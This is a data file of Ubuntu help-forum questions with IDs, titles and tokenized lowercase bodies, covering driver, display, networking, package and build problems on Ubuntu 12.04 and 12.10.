235863	where can i find more wallpaper packages ?	i was wondering if there are any wallpaper packages around . packages with loads of wallpapers which are as good as the pre-installed ones . anything close ?
235864	how to fix the sound in skype after starting teamspeak 3 ?	i 'm using ubuntu 12.10 64b . i installed skype for linux ( 4.1 from skype site for ubuntu 12.04 multiarch ) and then installed teamspeak 3 ( downloaded , extracted and run ts3client_linux_amd64 ) my problem is that when i start teamspeak i lose all sounds in skype . then when i close teamspeak after a few moments skype regains all sounds ... any ideas ? skype is set up to use pulse as mic , output and ringer .
235866	set emacs -nw as default editor	when editing files like sudoers , i want to use emacs instead of nano . so i ran this command sudo update-alternatives -- config editor and i selected emacs . the only issue is i like emacs in no window mode ( the -nw flag ) and i 've aliased emacs as emacs='emacs -nw ' so that i can use no window mode in normal use , but i do n't know how to get my default editor to be in no window mode . in other words , i need to get the command sudo visudo and similar commands that open up editors to open the file with emacs -nw . how can i do this ? i 'm on ubuntu 12.04 .
235868	how can i monitor syslog and send notification based on events ?	i 'm going to be sending syslog from my one device/server to an ubuntu server . on the ubuntu server ( receiving the syslog ) , i want it to trigger a script when specific syslog messages arrive . is this possible ?
235880	how to fix gpg in updater	i have asked this question before , but it was closed as a `` duplicate . '' i can assure you that my scenario is original , as it does not refer to third party ppa 's . i am having gpg problems with system updates . it says there is no public key available , and i have also been warned that my update information is outdated . here 's the terminal text : w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //extras.ubuntu.com quantal release : the following signatures could n't be verified because the public key is not available : no_pubkey 16126d3a3e5c1192 w : gpg error : http : // archive.canonical.com quantal release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : // us.archive.ubuntu.com quantal release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : // us.archive.ubuntu.com quantal-updates release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : // us.archive.ubuntu.com quantal-backports release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : // us.archive.ubuntu.com quantal-security release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : failed to fetch http : // extras.ubuntu.com/ubuntu/dists/quantal/release w : some index files failed to download . they have been ignored , or old ones used instead . i have put spaces in the urls because new users are not allowed more than two hyperlinks per question . please do n't just close this as a duplicate . it does not refer to third party ppa 's , it refers to the standard update packages issued by canonical .
235882	ubuntu 11.10 ( oneiric ) on samsung x10	after successfully running the live cd and testing wifi and other things i decided to install ubuntu as single operating system on my samsung x10 laptop . so far everything seemed ok , installation took a couple of hours and i completed it . starting the x10 from hdd with ubuntu shows an ubuntu screen and then an option to press s or ... . but it is too fast to read . the system seems to boot but the screen remains dark after the hint . the hdd led lights up while moving the mouse cursor using touchpad but the screen still remains dark . i can ping my pc on network , but that 's about it . help on troubleshooting from here is really appreciated . please keep in mind that i 'm very new to ubuntu . no newer ubuntu install possible , cos x10 does not support pae . external display via vga-port is working . display is flagged unknown and i am not in a position to change resolution ( to see the whole system settings screen ) nor to choose or install drivers for annother display . sry , i can not answer to your comments .
235885	why are my display settings not persistent ?	every time i reboot my laptop , even if i have n't unplugged the external monitor , it sets the external monitor back to overlapping with the laptop screen . i want them to stay 'side by side ' . running ubuntu 12.10 , with unity for my environment , and all current security updates . if you need more information , please ask . upon bootup this morning : csjewell @ curtislap : ~ $ ls -al .config/monitors.xml -rw-rw-r -- 1 csjewell csjewell 1019 jan 4 09:52 .config/monitors.xml csjewell @ curtislap : ~ $ cat .config/monitors.xml < monitors version= '' 1 '' > < configuration > < clone > no < /clone > < output name= '' lvds1 '' > < vendor > lgd < /vendor > < product > 0x0259 < /product > < serial > 0x00000000 < /serial > < width > 1920 < /width > < height > 1080 < /height > < rate > 60 < /rate > < x > 1920 < /x > < y > 0 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > no < /primary > < /output > < output name= '' vga1 '' > < vendor > del < /vendor > < product > 0xa079 < /product > < serial > 0x3255544c < /serial > < width > 1920 < /width > < height > 1200 < /height > < rate > 60 < /rate > < x > 0 < /x > < y > 0 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > yes < /primary > < /output > < output name= '' hdmi1 '' > < /output > < output name= '' dp1 '' > < /output > < /configuration > < /monitors > after changing it back to side-by-side : csjewell @ curtislap : ~ $ ls -al .config/monitors.xml -rw-rw-r -- 1 csjewell csjewell 1019 jan 7 08:55 .config/monitors.xml csjewell @ curtislap : ~ $ cat .config/monitors.xml < monitors version= '' 1 '' > < configuration > < clone > no < /clone > < output name= '' lvds1 '' > < vendor > lgd < /vendor > < product > 0x0259 < /product > < serial > 0x00000000 < /serial > < width > 1920 < /width > < height > 1080 < /height > < rate > 60 < /rate > < x > 1920 < /x > < y > 0 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > no < /primary > < /output > < output name= '' vga1 '' > < vendor > del < /vendor > < product > 0xa079 < /product > < serial > 0x3255544c < /serial > < width > 1920 < /width > < height > 1200 < /height > < rate > 60 < /rate > < x > 0 < /x > < y > 0 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > yes < /primary > < /output > < output name= '' hdmi1 '' > < /output > < output name= '' dp1 '' > < /output > < /configuration > < /monitors > hopefully this helps . i ended up finding my problem . i had installed jupiter and it was setting the monitor back on boot , because its settings said to do so . uninstalling jupiter fixed the problem ( because jupiter had no concept of me wanting the laptop on the right , but the bar on the left . ) thanks for the help , anyway !
235887	why evolution syncs the default google calendar 's calendar only ?	for each google calendar account there is a default calendar , but the user can add more calendars for example : family , school ... etc i synced my gmail account with evolution and it asks me whether i want to also sync google calendar and google contacts . i checked them , but i found that it only syncs the default calendar ignoring the rest of my calendars . why it does not sync the other ones automatically ? and how to do that manually if it is impossible to be done automatically .
235890	how can i access data on a computer without knowing the login password ?	there are a number of files ( photos , stories , poetry ... etc . ) on a computer that i need to retrieve . is there any way to get around the login procedure or to get to my files without the password ? any help would be appreciated and please break down any complicated directions as i have n't used a linux system for a few years .
235892	batch extract audio with avconv	i have about 70 mp4 files , and i want to extract the audio files directly without transcoding further . all the mp4 files have aac audio files . i understand i can use the following command to extract the audio file from one of the mp4 files : avconv -i `` input file '' -map 0:1 -c : a copy `` output file '' how do i extract all the audio files from all the 70 mp4 files , so i end up with 70 aac files ?
235894	do i need to umount usb drive before unplugging it when using udev ?	ubuntu 12.04.1 lts i 'm about to set up udev rules to automatically mount/umount an external usb drive when plugged or unplugged . i 'm concerned that by using udev to automatically unmount the filesystem , it could cause the file system to be corrupted if there is an outstanding io . surely it is too late to umount the file system after it has already been unplugged ? should i manually umount the file system ? will it cause an error if i umount the file system , and the udev rules also try to umount it when it is unplugged ? thanks for any help !
235897	is there a way to get rid of the default file manager for xubuntu without having to get rid of the desktop ?	i recently switched from lubuntu to xubuntu but i prefer lubuntu 's file manager , pcmanfm , to thunar , which is the default file manager in xubuntu . so i installed pcmanfm instead . then i tried to uninstall thunar via synaptic but this process wants to uninstall other software as well , including `` xubuntu-desktop '' . any suggestions greatly appreciated .
235905	use xrdp to connect to desktop session	i use ubuntu on my desktop . when i am away from my desktop , i would like to access the session using my windows 7 laptop . currently , i am using xrdp to connect , but it starts up a remote session . is there any way to just use the same desktop session ? i want to be able to pick up where i left off on the desktop . thanks
235907	simon listens 4.0 build error	when trying to install simon listens 4.0 , i get this error message : sudo ./build_ubuntu.sh cmake error at /usr/share/cmake-2.8/modules/findkde4.cmake:98 ( message ) : error : cmake/modules/findkde4internal.cmake not found in /home/me/.kde/share/apps ; /usr/share/kde4/apps call stack ( most recent call first ) : cmakelists.txt:17 ( find_package ) -- configuring incomplete , errors occurred ! could someone please tell me how to fix this . i am using ubuntu 12.04 64-bit .
235910	what gsm middleware will `` ubuntu for phones '' use ?	there are bunch of existing free software solutions for handling gsm modem in phone solutions , for instance qtopia ( maintained now by community as qtmoko ) , freesmartphone.org and ofono . i could n't find any information about what ubuntu will use on mobile phones or if it will come with something brand new . was this decision already made ? if yes , then which technology has been chosen ?
235913	how to return to normal display after hdmi disconnect ?	after i disconnected my tv by pulling the hdmi cable , ubuntu did not return to the right graphics mode . there is only the background , no launchers or icons , however i can open a menu by right clicking . i am using ubuntu 12.10 , and i have amd catalyst 12.10 installed .
235919	why does ipv6 kill my network in ubuntu 12.04 ?	ok , so i have nice ubuntu 12.04 headless server running . it 's very happy . it 's my router/firewall/dns/etc . eth0 is wan , eth1 is lan . i can easily get my ipv6 hurricane electric tunnel connected , and my server will continue to work just fine , and sees & browses both ip4 & ip6 sites . yay . but if ip6 is running , i can not , for the life of me , get the rest of my network to browse anything outside my network . but if i roll back the changes , my network is fine . dns seems to still work , as i can ping from a client machine & it will resolve the address , but it wo n't actually return pings . what information can i give that will help y'all help me ? my guess is it 's not bridging from eth1 to eth0 properly after i add ip6 . but i ca n't figure out why the ip4 bridge breaks . here is my working interfaces : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address < isp-staticip > netmask 255.255.255.240 network < isp-assigned > broadcast < isp-assigned > gateway < isp-assigned > dns-nameservers 208.67.222.222 208.67.220.220 8.8.8.8 8.8.4.4 post-up iptables-restore < /etc/iptables.up.rules dns-domain tymanthius.net # dns-* options are implemented by the resolvconf package , if installed mtu 9000 auto eth1 iface eth1 inet static address 192.168.1.1 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 mtu 9000 and this is broken one : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo eth0 eth1 he-ipv6 iface lo inet loopback # the primary network interface iface eth0 inet static address < isp-staticip > netmask 255.255.255.240 network < isp-assigned > broadcast < isp-assigned > gateway < isp-assigned > dns-nameservers 208.67.222.222 208.67.220.220 8.8.8.8 8.8.4.4 2620:0 : ccc : :2 2620:0 : ccd : :2 2001:4860:4860 : :8888 2001:4860:4860 : :8844 dns-domain tymanthius.net gateway 98.175.23.209 # dns-* options are implemented by the resolvconf package , if installed iface eth1 inet static address 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 iface he-ipv6 inet6 v4tunnel endpoint 216.218.224.42 address 2001:470:1f0e:1034 : :2 netmask 64 up ip -6 route add default dev he-ipv6 down ip -6 route del default dev he-ipv6 gateway 2001:470:1f0e:1034 : :3 iface eth0 inet6 static pre-up /sbin/modprobe -q ipv6 ; /bin/true address 2001:470:1f0e:1034 : :3 netmask 64 iface eth1 inet6 static pre-up /sbin/modprobe -q ipv6 ; /bin/true address 2001:470:1f0e:1034 : :4 netmask 64 the only other change i made was to add a line to sysctrl.conf that reads `` net.ipv6.conf.default.forwarding=1 ''
235920	failed to download repository information in update manager no data 1 nodata 2	check your internet connection . details : e : gpg error : http : //linux.ntuoss.org precise release : the following signatures were invalid : nodata 1 nodata 2
235926	how to install ubuntu on the samsung galaxy s3 ?	i have read about this on xda developers , the articles were a few months old though . is there an official guide from ubuntu on how to do this ?
235929	what is this partition and can i delete it to recover space ?	i have just downloaded and begun using ubuntu today so bare with me here . i have a laptop without a hard dive , and am running ubuntu off a 8gb flash-drive . i have ubuntu installed onto the flashdrive itself and it has been running smoothly . up until now i have had no clue what partitions are and i had just recently discovered after downloaded gparted . i found out that for some reason my usb is split into two partitions , and i was wondering if there is any way of getting it to be one big one , or if there is a reason its in two . as my computer says i have only around 200mb of disk space left but there is a separate partition that is almost empty . i 've fiddled around with it a bit and this is what i 'm presented with :
235930	wget scheme missing	when i run wget from terminal with command wget targetfile.php i got error `` scheme missing '' . what does it is suppose to mean and how to fix it ? i googled but all links i found is speaking of drupal wget . i 've tried using absolute path but still not working and yield the same error . i 'm trying to set up cronjob here . i follow this tutorial http : //www.thesitewizard.com/general/set-cron-job.shtml where then it leads me to use wget . tried wget absolutepath/targetfile.php usr/bin/wget absolutepath/targetfile.php also tried using relativepath to targetfile.php by changing directory to absolutepath first .
235933	fsck results for ubuntu 12.10	can somebody look at my results of fsck ? my problem is that every single time that i 'm booting my laptop i get initramfs error prompt every time i 'm making fsck from a liveusb . i have been using linux for 2 years now and this is the first time i got this problem . for the first week after fresh install of ubuntu 12.10 it was ok but after a week the problem started . can somebody help me ? these are the results
235941	second monitor not detected	i switched from 12.04 to 12.10 yesterday evening ( fresh install ) . now i 'm struggling with my second monitor , which i ca n't configure . in 12.04 , after installing the system , i got a notice telling me that i 'd need to install further graphic drivers . after doing so i had a nvidia control center where i was able to configure everything . however , 12.10 did n't ask me about graphic drivers and there 's also no nvidia-settings application installed . i ca n't see the second external monitor ( connected via dvi ) , only the internal one and one of the external monitor ( connected via vga , both monitors are the same model ) . i have a hp elitebook 8530w with an nvidia graphics card ( quadro , i do n't know where to show the exact type of the card ) . when booting , ubuntu configures dual screen for one of the external monitor and the internal laptop monitor . but i somehow ca n't tell him to turn off the internal monitor and use the second external monitor instead .
235942	ubuntu 12.04 and 12.10 fails to boot after usb 1-1.4	i 'd like to first apologize for my lack of detail in the information as i 'm new to linux and i 'd be happy to provide more if you point me in the right direction . i 've tried both 12.04 and 12.10 and both have had issues booting . in 12.04 i could n't reboot . a reboot would cause a hang and after the system hanging repeated times , it would start working again . when i would boot up in `` regular mode '' , it would hang at a purple screen . i then tried recover mode which would hang at `` fb : conflicting fb hw usage inteldrmfb vs efi vga - removing generic driver '' . i found an article recommending removing `` gfxmode $ linux_gfx_mode '' from the normal boot entry but it was n't present . then i removed the quiet splash from the normal boot and found that after `` usb 1-1.4 : new full-speed usb device number 4 using ehci_hcd '' the system would hang . then i would get `` info : task swapper/0:1 blocked for more than 120 seconds '' with some hex details and a verbose output . i was advised to upgrade to 12.10 to avoid any potential issues although i wanted to run 12.04 for the lts side of things . i did a full fresh install of 12.10 and not an upgrade . with 12.10 , i have rebooted a few times without issue . i then tried to perform a shutdown which seemed fine until i tried to boot back up and again found i was having issues . the only difference i 've found in 12.10 is that now it hangs after the following : usb 1-1.4 : new full-speed usb device number 4 using ehci_hcd usb 1-1.4 : new usb device found , idvendor=0489 , idproduct=e042 usb 1-1.4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 usb 1-1.4 : product : bcm20702a0 usb 1-1.4 : manufacturer : broadcom corp and then in hangs again at task swapper . for hw this is a new lenovo z480 and any help you could provide would be well appreciated . thanks !
235943	watching share video	i have been trying to share a video via ubuntu one but notice a very slow download speed and i have not been able to find out how long the video will take to download either . additionally , i find that when i share the same video by google drive and i find it to work perfectly . just like a youtube video ; fast , not at all choppy and easy to share by email too ! i have also found that the firefox plug-in works horribly with mp4 files too . i can only describe the streaming as being `` choppy '' . is there a way to fix this problem with ubuntu one ? ( i have an intel driver )
235944	can unity-webapps make the target refresh ?	i 've got a working deviantart webapp , the message counts are working , although they never change . i 'd like to refresh the webpage they 're on so we get new totals . is there any way of doing that ?
235946	why does n't my system boot from the installation disk ?	in bios , i have set the cd drive as a priority boot drive . the dvd boots fine on my other desktop ( windows 7 ) . my pc is a bit old , is this the problem ? the dvd drive tries to boot but after a while , it boots to the c : / drive .
235950	how do i upgrade from ubuntu 12.04.1 lts to 12.10 ?	i tried updating and it does n't show the upgrade . can i install from the terminal ? i 'm new to this , but i have n't messed my computer up so far . what steps do i take ?
235951	can kingsoft office be installed ?	can kingsoft office be installed in ubuntu ?
235955	ubuntu 12.04 bind dlz	when compiling bind with dlz support it does not want to compile bind9/bind9-9.8.1.dfsg.p1/debian/rules configure : configure-stamp configure-stamp : dh_testdir ./configure -- prefix=/usr \ -- mandir=\ $ $ { prefix } /share/man \ -- infodir=\ $ $ { prefix } /share/info \ -- sysconfdir=/etc/bind \ -- localstatedir=/var \ -- disable-threads \ -- enable-largefile \ -- with-libtool \ -- enable-shared \ -- enable-static \ -- with-openssl=/usr \ -- with-gssapi=/usr \ -- with-gnu-ld \ -- with-dlz-mysql=yes \ -- with-dlz-bdb=no \ -- with-geoip=/usr \ -- enable-ipv6 \ $ ( extra_features ) dpkg-buildpackage -rfakeroot -b error below . nba.o .libs/lwdgrbn.o .libs/lwdnoop.o .libs/lwsearch.o .libs/dlz_drivers.o .libs/sdlz_helper.o .libs/dlz_mysql_driver.o unix/.libs/os.o unix/.libs/dlz_dlopen_driver.o ../../lib/lwres/.libs/liblwres.so ../../lib/dns/.libs/libdns.so -lgssapi_krb5 -lcrypto ../../lib/bind9/.libs/libbind9.so ../../lib/isccfg/.libs/libisccfg.so ../../lib/isccc/.libs/libisccc.so ../../lib/isc/.libs/libisc.so -l/usr/lib/mysql -lmysqlclient -lz -lcrypt -lm -ldl -lcap -l/usr/lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu/libxml2.so .libs/dlz_mysql_driver.o : in function `mysql_get_resultset ' : dlz_mysql_driver.c : ( .text+0x3e7 ) : undefined reference to `sdlzh_build_querystring' dlz_mysql_driver.c : ( .text+0x48f ) : undefined reference to `sdlzh_build_querystring' dlz_mysql_driver.c : ( .text+0x4af ) : undefined reference to `sdlzh_build_querystring' dlz_mysql_driver.c : ( .text+0x4cf ) : undefined reference to `sdlzh_build_querystring' dlz_mysql_driver.c : ( .text+0x4ef ) : undefined reference to `sdlzh_build_querystring' .libs/dlz_mysql_driver.o : dlz_mysql_driver.c : ( .text+0x50f ) : more undefined references to `sdlzh_build_querystring ' follow .libs/dlz_mysql_driver.o : in function `mysql_create ' : dlz_mysql_driver.c : ( .text+0x10e7 ) : undefined reference to `sdlzh_get_parameter_value' dlz_mysql_driver.c : ( .text+0x110e ) : undefined reference to `sdlzh_get_parameter_value' dlz_mysql_driver.c : ( .text+0x11bd ) : undefined reference to `sdlzh_destroy_sqldbinstance' dlz_mysql_driver.c : ( .text+0x12b5 ) : undefined reference to `sdlzh_build_sqldbinstance' dlz_mysql_driver.c : ( .text+0x1381 ) : undefined reference to `sdlzh_build_sqldbinstance' dlz_mysql_driver.c : ( .text+0x13be ) : undefined reference to `sdlzh_get_parameter_value' dlz_mysql_driver.c : ( .text+0x1415 ) : undefined reference to `sdlzh_get_parameter_value' dlz_mysql_driver.c : ( .text+0x146a ) : undefined reference to `sdlzh_get_parameter_value' dlz_mysql_driver.c : ( .text+0x14bf ) : undefined reference to `sdlzh_get_parameter_value' dlz_mysql_driver.c : ( .text+0x14d8 ) : undefined reference to `sdlzh_get_parameter_value' .libs/dlz_mysql_driver.o : dlz_mysql_driver.c : ( .text+0x14f1 ) : more undefined references to `sdlzh_get_parameter_value ' follow .libs/dlz_mysql_driver.o : in function `mysql_create ' : dlz_mysql_driver.c : ( .text+0x1649 ) : undefined reference to `sdlzh_build_sqldbinstance' dlz_mysql_driver.c : ( .text+0x16ab ) : undefined reference to `sdlzh_build_sqldbinstance' .libs/dlz_mysql_driver.o : in function `mysql_destroy ' : dlz_mysql_driver.c : ( .text+0x1006 ) : undefined reference to `sdlzh_destroy_sqldbinstance' collect2 : ld returned 1 exit status make [ 3 ] : *** [ named ] error 1 make [ 3 ] : leaving directory `/usr/local/src/bind9/bind9-9.8.1.dfsg.p1/bin/named' make [ 2 ] : *** [ subdirs ] error 1 make [ 2 ] : leaving directory `/usr/local/src/bind9/bind9-9.8.1.dfsg.p1/bin' make [ 1 ] : *** [ subdirs ] error 1 make [ 1 ] : leaving directory `/usr/local/src/bind9/bind9-9.8.1.dfsg.p1' make : *** [ build-stamp ] error 2 dpkg-buildpackage : error : debian/rules build gave error exit status 2
235957	error while compiling speech_tools can not find -lcurses	i get the following error when compiling speech_tools . /usr/bin/ld : can not find -lcurses /usr/bin/ld : can not find -lncurses collect2 : ld returned 1 exit status make [ 1 ] : *** [ ch_lab ] error 1 make : *** [ main ] error 2 it ca n't find -lcurses
235962	how can i uninstall qtcreator 2.6.1 from 12.04 ?	i downloaded qtcreator 2.6.1 from the official website http : //qt-project.org/downloads # qt-creator because i 'm using ubuntu 12.04 . now i need to uninstall it . how can i do it ? 64-bit linux installer
235964	menu options whitened after installing theme	i have installed some themes like ( hope , ambiance blue etc ) in my ubuntu 12.10 . no matter which theme i install , the menu options are whitened so also the options appearing on right click . i am giving a screen shot for better understanding . https : //www.dropbox.com/s/n4v3js3twexzk01/bug.png can any one help me out ?
235969	hp touchsmart 610-wireless card not working	i recently deleted windows 8 from my computer and am currently running ubuntu , and ubuntu alone ( version 12.10 ) . i have one problem , my wireless card does not seem to be working ! i have an hp touchsmart 610 and the internal card has been acting funny for a while so i purchased an external one ... a tp link . i have tried to install and run the windows wireless adapters app and i have installed wine , but none of this works ! how can i get the thing to work ?
235970	how can i enable unity 3d with hybrid graphics radeon 7970m ?	when i log into ubuntu 12.04 , i do n't get unity 3d , even though i think i am seeing 3d acceleration at the login screen . i do n't want to use the fglrx drivers , the default one does n't seem to work , and the `` ( post-release updates ) '' one refuses to even install . my laptop has an integrated intel card , which i would be happy to use exclusively ( i boot into windows when i want to do graphically intensive stuff ) . there is also an hd 7970m graphics card in the laptop , which i suppose would be nice to take advantage of sometimes , but i certainly do n't want it running all the time . does anyone have any idea how to properly enable unity 3d ? here is some debugging info : unity_support_test : $ /usr/lib/nux/unity_support_test -p error : glx is not available on the system glxinfo : $ glxinfo name of display : :0 xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . lshw : $ sudo lshw -c video *-display unclaimed description : vga compatible controller product : advanced micro devices [ amd ] nee ati vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller cap_list configuration : latency=0 resources : memory : e0000000-efffffff memory : f7b00000-f7b3ffff ioport : e000 ( size=256 ) memory : f7b40000-f7b5ffff *-display description : vga compatible controller product : ivy bridge graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) lspci : $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati device 6800
235972	ubuntu 12.10 or 12.04 ?	im new in linux , i downloaded ubuntu 12.10 . should i download 12.04 ? what 's are the difference between the two ? thanks !
235973	purple screen on boot , computer frozen	i just installed ubuntu 12.10 alongside windows 8 and it worked several times when i booted the computer up to ubuntu . however , when i tried to restart my computer today it got stuck at the purple screen that says : `` error : run list overflown . press any key to continue . '' the cursor is not blinking and the computer is frozen . currently , my computer is stuck on that screen and i ca n't shut it off by holding the power button either . my machine is a samsung series seven chronos and does n't have a removable battery . what should i do ?
235980	there is no boot sector in usb ?	i had downloaded the ubuntu 12.10 desktop iso file and used the usb installer provided at pendrivelinux.com to boot from the usb device . i can not install ubuntu from windows as i am having some network issues in connecting from windows . when the system is restarted using the usb device as the primary boot option , i am able to use the `` try the ubuntu '' option . but when i click install ubuntu , it selects the available network and restarts . it just shows me the error `` there is no boot sector in usb `` and logins into the windows screen . please help me in solving this issue . thanks , arun
235985	clean install of ubuntu , is this proccess right ?	i have been using ubuntu from a wubi installation for a year now and i really like it , so i 'm considering installing it fresh on a new partition , rather than the ntfs windows one . i have n't done this again , so i 'd like a few tips . also , on my current install hibernate does n't work , and i 'd really love to have that feature working on my next install . so here is what i 'm planning to do : log on to windows and create a partition on my hard drive . format above partition in an ubuntu friendly file system ( should i go for ext4 or xfs ? ) log on to ubuntu and create a bootable usb drive with ubuntu reboot and follow install instructions is the above process ok ? am i missing something ? also , wht should i do to get hiberate to work as well ?
235986	12.10 or 12.04 on asus u36sg ?	i have installed ubuntu 12.10 on my laptop and there are some problems : 1.i could n't install the video driver ( gpu 610m ) neither from nvidia 's site nor manually from the terminal . 2.battery life is much shorter than in windows and i do n't know how to improve it after installing ubuntu and series of upgrades my desktop was clean ( empty ) . i can see only the background image . i managed to run firefox with the terminal so that i can write this post . it is the first time that i have installed linux ( ubuntu ) . please help me with your know-how : )
235988	archive manager is causing nautilus to hang , how do i troubleshoot this ?	i downloaded a tar.gz file and opened it with archive manager . when i try to copy files and folders from the archive , the copy files process will hang after a few files has been copied successfully . the hanging remains even if the `` file operations '' window are closed . i know this because when i try to unmount the mounted archive , there will pop-up a dialogue box and says : 'file operations ( nautilus -n ) are keeping the volume busy ! ' and the archive can not be unmounted even if i click the `` unmount anyway '' button . ubuntu 12.10 ( amd64+mac ) running on vmware fusion 5 how do i troubleshoot this issue and find out what is causing nautilus to hang ?
235995	diskless workstations	i want to run diskless booting with pxe . the gotchas at the end of the diskless-howto [ 1 ] is quite long . i am unsure how to get this done . here are my current possible solutions : use debian live and not ubuntu use aufs [ 2 ] the how-to states `` confirmed to work with ubuntu 12.04. '' . but maybe i am doing something wrong , i do n't think it works this way for several diskless clients sharing one nfsroot . what is the most painless way to get diskless workstations ? ps : i ca n't create the new tag `` diskless '' . please create and add it . thank you . 1 : https : //help.ubuntu.com/community/disklessubuntuhowto 2 : https : //help.ubuntu.com/community/aufsrootfilesystemonusbflash
236000	how do i jailbreak my ipad with ubuntu ?	i was recently given an apple ipad and its software restrictions limit what i can do with it ( installing software from other sources , customization , file explorer , etc ) . i know that the solution would be to `` jailbreak '' it , that is to say to gain root access on it . how do i perform a jailbreakâ ? as most apps are created for other operating systems , i would appreciate a software recommendation . i run ubuntu 12.10 and own a first generation apple ipad with ios 5.1.1 .
236010	ubuntu mailing services with magento	i 'm having some issues with sending emails out from magento . i 'm very new to ubuntu and had been playing with it for the past 2 days . is there anything i need to do to allow my mail to be sent out ? i did read about postfix , but not very sure if its a configuration to enable mail sending from magento . any advice here would be greatly appreciated . i use ses amazon mail services which requires tls . ubuntu with magento in it is hosted at ec2 amazon . i also tried a extension to try get my mail out but unfortunately it does n't go out . ec2 ports had been opened and i did manage to send a mail out with postfix 2 days ago . now , it feels like the connection between magento and ubuntu that is causing issue . **starting to realise how important linux is : )
236012	ca n't install qt-components-ubuntu because i 'm using full release of qt 5.0.0	it appears that since i did n't install the beta1 version of qt5 from the ppa , i 'm unable to use the ubuntu components package . i have the released version qt5 already and not interested in installing a beta version now . is there a workaround ? the following packages have unmet dependencies : qt-components-ubuntu : depends : qtbase but it is not installable depends : qtdeclarative but it is not installable the instructions to install the preview toolkit are here . i skipped the step to install qt5 because i already have a newer version straight from qt-project.org .
236017	kvm - guest does not recognize second nic	i have a server running proxmox ( a virtualization platform ) , and created a kvm virtual machine with ubuntu server 12.10 . after configuring the network , everything works fine , but if i add a second network adapter to that virtual machine , it is not recognized . dmesg | grep -i eth just shows one interface ( eth0 ) .
236021	how do i remove openjdk without losing jdownloader ?	i recently installed sun 's java because of performance issues running minecraft . when i try to remove the openjdk packages by sudo apt-get purge openjdk* however , the jdownloader package is being removed as well . if i try to remove all openjdk-7 packages one by one , openjdk-6 is being installed instead . imho there should be a way to satisfy jdownloader 's dependencies for a java runtime environment with sun 's version . is there any way to keep jdownloader while completely removing the opensource java versions ?
236022	can i download and install any windows software in ubuntu ?	can i download and install any windows software in ubuntu ? for example : google chrome , office , minecraft , battlefield 3 ... ..
236028	xorg failsafe error : screen ( s ) found but none have a usable configuration - nvidia gtx 460	i 'm running ubuntu 12.04 x64 , kernel 3.2.0-24-generic with an nvidia gtx460 and 2560 x 1440 monitor . since replacing my ati video board with the gtx460 i 've been unable to get x-windows and unity running . initially i booted to a 2d desktop rather than unity , but since i tried to update my video drivers to nvidia , and purged all the ati drivers , after the grub menu - small text - ubuntu boots into a black screen . the recovery menu is accessible , and from there i can access the root command line , however failsafe graphics does n't work . in recovery mode failsafe graphics gets the error message : ( ee ) screen ( s ) found but none have a usable configuration fatal server error : no screens found by the way when any of the recovery menu selections hang or end in an error , i 'm unable to return to the recovery menu or a command prompt - i 've tried various commands and key combinations but the only result of say ctrl+d or exit has been to attempt to boot ubuntu normally , ending in a black screen . so i end up pulling the plug - i 'd appreciate any better ideas for this . i updated all packages , repaired etc . i purged and reinstalled xserver : apt-get remove -- purge xserver-xorg apt-get install xserver-xorg dpkg-reconfigure xserver-xorg since reinstalling xserver the /var/log/xorg.failsafe.log against pci where my graphics card should be lists something like ( taken from a similar example ) : ( -- ) pci : * ( 0:0:16:0 ) 1002:5046:0000:0000 rev 0 , mem @ 0x94000000/67108864 , 0x90000000/16384 , i/o @ 0x00000400/256 , bios @ 0x ? ? ? ? ? ? ? ? /131072 cat /var/log/xorg.0.log | grep pci returns ( ii ) nvidia ( 0 ) : nvidia gpu geforce gtx 460 ( gf104 ) at pci:1:0:0 ( gpu-0 ) ( ii ) nvidia ( 0 ) : detected pci express link width : 16x ( ii ) nvidia ( 0 ) : connected display device ( s ) on geforce gtx 460 at pci:1:0:0 lspci |grep vga returns vga compatible controller : nvidia corporation gf104 [ geforce gtx 460 ] 